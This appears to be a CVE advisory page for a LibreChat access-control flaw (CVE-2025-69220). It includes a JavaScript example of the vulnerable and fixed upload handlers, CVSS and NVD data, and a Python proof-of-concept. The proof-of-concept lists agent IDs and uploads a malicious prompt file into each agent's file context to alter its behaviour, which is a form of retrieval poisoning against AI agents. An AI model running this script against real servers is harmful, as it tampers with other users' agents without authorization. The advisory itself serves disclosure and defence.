Security Vulnerability Report
CVE-2025-69220 CVSS 7.1 HIGH

CVE-2025-69220

Published: 2026-01-07 21:16:00
Last Modified: 2026-01-15 21:44:58

Description

LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control for file uploads to an agent's file context and file search. An authenticated attacker with access to the agent ID can change the behavior of arbitrary agents by uploading new files to the file context or file search, even if they have no permissions for this agent. This issue is fixed in version 0.8.2-rc2.
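The flaw described above is a missing authorization check on a mutating endpoint: the server verifies that the caller is logged in, but not that the caller may modify the agent whose ID is in the request. The following is an added illustration written for this report, not LibreChat's own code or its fix: an "authenticated-only" upload handler that mirrors the pattern in the description sits next to a hardened handler that checks the caller's rights on the specific agent before any file is attached and records denials for detection. The agent record shape, the `EDIT` permission name, the request shape and all handler names are assumptions.

```javascript
// Added example, not LibreChat's code: resource-level authorization for agent
// file uploads next to the "authenticated-only" pattern that CVE-2025-69220
// describes. Agent shape, the EDIT permission name, the request shape and the
// handler names are assumptions made for this illustration.

const PERM_EDIT = 'EDIT'; // assumed permission label

// Constructed sample data: alice owns agent_a and lets bob edit it;
// carol owns agent_b and shares it with nobody.
function makeSampleAgents() {
  return new Map([
    ['agent_a', { id: 'agent_a', author: 'alice', collaborators: { bob: [PERM_EDIT] }, files: [] }],
    ['agent_b', { id: 'agent_b', author: 'carol', collaborators: {}, files: [] }],
  ]);
}

// True only for the owner or a collaborator explicitly granted EDIT.
function canEditAgent(userId, agent) {
  if (agent.author === userId) return true;
  const perms = agent.collaborators[userId] || [];
  return perms.includes(PERM_EDIT);
}

// Vulnerable pattern: authentication is checked, authorization on the agent
// is not, so any logged-in user who knows an agent id can attach files to it.
function uploadFileVulnerable(store, req) {
  if (!req.user) return { status: 401, body: 'unauthenticated' };
  const agent = store.get(req.params.agentId);
  if (!agent) return { status: 404, body: 'no such agent' };
  agent.files.push({ name: req.file.name, uploadedBy: req.user.id });
  return { status: 201, body: { agentId: agent.id, fileCount: agent.files.length } };
}

// Hardened pattern: the upload is authorized against the specific agent before
// any state changes, and each denial is written to an audit log so repeated
// probing of agent ids by one account is visible to detection.
function uploadFileHardened(store, req, audit = []) {
  if (!req.user) return { status: 401, body: 'unauthenticated' };
  const agent = store.get(req.params.agentId);
  if (!agent) return { status: 404, body: 'no such agent' };
  if (!canEditAgent(req.user.id, agent)) {
    audit.push({
      event: 'agent_file_upload_denied',
      user: req.user.id,
      agentId: agent.id,
      file: req.file.name,
    });
    return { status: 403, body: 'forbidden' };
  }
  agent.files.push({ name: req.file.name, uploadedBy: req.user.id });
  return { status: 201, body: { agentId: agent.id, fileCount: agent.files.length } };
}

// Constructed request: mallory is authenticated but has no rights on agent_b.
// Returns the status each handler gives and how many denials were audited.
function demo() {
  const req = { user: { id: 'mallory' }, params: { agentId: 'agent_b' }, file: { name: 'prompt.txt' } };
  const audit = [];
  const before = uploadFileVulnerable(makeSampleAgents(), req).status;
  const after = uploadFileHardened(makeSampleAgents(), req, audit).status;
  return { before, after, denied: audit.length };
}

console.log(JSON.stringify(demo())); // {"before":201,"after":403,"denied":1}
```

The check runs against the agent record itself rather than against a role carried in the session, which is the point of the fix: ownership and sharing are properties of the resource, so the decision has to be made per request against that resource. Returning 403 and logging the denial is a reasonable default; an installation that treats agent IDs as confidential may prefer to answer 404 for both unknown and unauthorized IDs.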

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:librechat:librechat:0.8.1:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:librechat:librechat:0.8.1:rc1:*:*:*:*:*:* - VULNERABLE
LibreChat < 0.8.2-rc2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import json

# CVE-2025-69220 PoC - LibreChat Agent File Upload Access Control Bypass
# This PoC demonstrates uploading files to arbitrary agents without proper authorization

BASE_URL = "http://target-librechat-server.com"
ATTACKER_TOKEN = "your-authenticated-user-token"
TARGET_AGENT_ID = "target-agent-id-to-exploit"
MALICIOUS_FILE_CONTENT = "Malicious content that will affect agent behavior"


def upload_file_to_agent(agent_id, file_content):
    """Upload a file to the agent's file context; the server performs no authorization check."""
    url = f"{BASE_URL}/api/agents/{agent_id}/files"
    # Only the Authorization header is set by hand: requests builds the
    # multipart body and its boundary itself, and a hand-written
    # "Content-Type: multipart/form-data" header lacks the boundary.
    headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"}
    files = {"file": ("malicious_prompt.txt", file_content, "text/plain")}
    response = requests.post(url, headers=headers, files=files)
    return response.status_code, response.text


def search_agents_for_ids():
    """Enumerate agent IDs to find target agents."""
    url = f"{BASE_URL}/api/agents"
    headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"}
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        return json.loads(response.text)
    return []


def exploit():
    """Main exploitation function."""
    print("[*] Starting CVE-2025-69220 exploitation...")
    print("[*] Enumerating available agents...")
    agents = search_agents_for_ids()
    for agent in agents:
        agent_id = agent.get("id")
        print(f"[*] Attempting file upload to agent: {agent_id}")
        status, resp = upload_file_to_agent(agent_id, MALICIOUS_FILE_CONTENT)
        if status in (200, 201):
            print(f"[+] Successfully uploaded file to agent {agent_id}")
            print("[+] Agent behavior may now be modified")


if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69220", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:15:59.547", "lastModified": "2026-01-15T21:44:57.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control for file uploads to an agents file context and file search. An authenticated attacker with access to the agent ID can change the behavior of arbitrary agents by uploading new files to the file context or file search, even if they have no permissions for this agent. This issue is fixed in version 0.8.2-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-862"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:librechat:librechat:0.8.1:-:*:*:*:*:*:*", "matchCriteriaId": "98BB9E92-2D0E-4975-A966-734F3858551B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "8DAB7F45-699A-4383-ABEA-D4374E58EE95"}]}]}], "references": [{"url": "https://cwe.mitre.org/data/definitions/284.html", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://cwe.mitre.org/data/definitions/862.html", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/danny-avila/LibreChat/commit/4b9c6ab1cb9de626736de700c7981f38be08d237", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-xcmf-rpmh-hg59", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://owasp.org/Top10/A01_2021-Broken_Access_Control", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema.html", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://raw.githubusercontent.com/OWASP/ASVS/v5.0.0/5.0/OWASP_Application_Security_Verification_Standard_5.0.0_en.pdf", "source": "[email protected]", "tags": ["Technical Description"]}]}}